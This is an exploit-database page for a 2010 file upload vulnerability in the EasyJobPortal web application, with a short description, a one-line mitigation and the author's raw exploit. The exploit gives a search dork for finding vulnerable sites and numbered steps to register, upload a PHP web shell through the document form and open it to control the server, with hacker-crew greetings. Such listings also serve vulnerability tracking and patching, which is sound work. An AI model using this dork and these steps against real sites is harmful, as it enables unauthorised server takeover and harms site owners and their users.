EasyJobPortal - exploit.company

vendor:

EasyJobPortal

by:

MeGo

7,5

CVSS

HIGH

Remote File Upload

434

CWE

Product Name: EasyJobPortal

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

EasyJobPortal << upload shell

EasyJobPortal is vulnerable to a remote file upload vulnerability. An attacker can register on the website, create a new document and upload a malicious shell.php file. The attacker can then access the shell.php file by editing the document. This allows the attacker to gain access to the server.

Mitigation:

Ensure that all user-uploaded files are validated and sanitized before being stored on the server.

Source

Exploit-DB raw data:

#################################################################
# Exploit :  EasyJobPortal << upload shell

# Date    :  13-11-2010

# Author  :  MeGo

# Version :  n/a

# DorK    :  inurl:jobseeker_register.php  

# Home    :  WwW.P0C.cC/vb

# Email   :  EG5-@hotmail.com , M3GO@live.com

# Vendor  :  http://www.easyjobportal.com
################################################################# 

[+] Exploit

[1] Register Frist ..
[-] http://localhost/path/jobseeker_register.php

[2] Create New Upload Your Shell.php ..
[-] http://localhost/path/jobseeker_document.php

[3] To See Shell Edit Your Document
[-] http://localhost/path/files/document/1/Shell.php

[4] Now Your R00T Box

[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]

Great 2 : P0C Member , Roots , V4-Team Members , Roots

SGreatz : X-Father , Mo7a , My Keybord :D

./D0n3

[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]